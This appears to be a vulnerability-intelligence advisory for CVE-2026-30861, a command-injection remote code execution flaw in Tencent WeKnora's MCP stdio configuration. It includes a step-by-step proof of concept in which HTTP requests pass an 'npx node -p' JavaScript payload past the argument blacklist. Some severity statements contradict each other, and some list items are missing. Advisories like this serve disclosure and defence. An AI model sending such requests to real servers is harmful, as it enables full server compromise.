Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-30861 is a high severity vulnerability with a CVSS score of 8.8. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A critical unauthenticated remote code execution (RCE) vulnerability exists in the MCP stdio configuration validation introduced in version 2.0.5.
The application allows unrestricted user registration, meaning any attacker can create an account and exploit the command injection flaw. Despite implementing a whitelist for allowed commands (npx, uvx) and blacklists for dangerous arguments and environment variables, the validation can be bypassed using the -p flag with npx node. This allows any attacker to execute arbitrary commands with the application's privileges, leading to complete system compromise.
The vulnerability remained unfixed across multiple releases (2.0.6-2.0.9) before being silently patched in version 2.0.10, without a published CVE, potentially leaving customers unaware.
The application's open registration policy, combined with the vulnerable MCP stdio configuration, creates an unrestricted attack surface. Any attacker can:
The security patch introduced in commit f7900a5e9a18c99d25cec9589ead9e4e59ce04bb attempts to prevent command injection through:
uvx and npx are allowedLD_PRELOAD, PATH, etc.However, the patch has a critical flaw: the -p flag in npx node is not explicitly blocked in the DangerousArgPatterns regex list. The -p flag allows Node.js to evaluate and execute arbitrary JavaScript code, effectively bypassing the argument validation.
The vulnerable code flow:
ValidateStdioConfig() calls ValidateStdioArgs(args)ValidateStdioArgs() checks each argument against DangerousArgPatterns-p or similar execution flags["node", "-p", "require('fs').writeFileSync(...)"] pass validationnpx node -p <payload> executes the JavaScript payloadTimeline of Concern:
This silent fix pattern poses significant risks:
Step 1: Register a new account (unauthenticated)
Step 2: Create a malicious MCP service
POST /api/v1/mcp-services HTTP/1.1
Host: localhost:8080
Authorization: Bearer [JWT_TOKEN_FROM_REGISTRATION]
Content-Type: application/json
{
"name":"rce",
"description":"rce",
"enabled":true,
"transport_type":"stdio",
"stdio_config":{
"command":"npx",
"args":["node","-p","require('fs').writeFileSync('/tmp/pwned.txt', 'Hacked by attacker')"]
},
"env_vars":{}
}
Response will contain the service ID (e.g., 087854f4-bde3-4468-8702-4aeb95c868da)
Step 3: Trigger the RCE by testing the service
POST /api/v1/mcp-services/087854f4-bde3-4468-8702-4aeb95c868da/test HTTP/1.1
Host: localhost:8080
Authorization: Bearer [JWT_TOKEN_FROM_REGISTRATION]
Content-Type: application/json
{}
Step 4: Verify exploitation
On the server, the file /tmp/pwned.txt will be created with content "Hacked by attacker", confirming arbitrary command execution.
Severity: Critical
Unauthenticated RCE allowing complete server compromise. An attacker can register an account and execute arbitrary commands with full application privileges.
Immediate Actions:
| Vendor | Product |
|---|---|
| Tencent | Weknora |
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.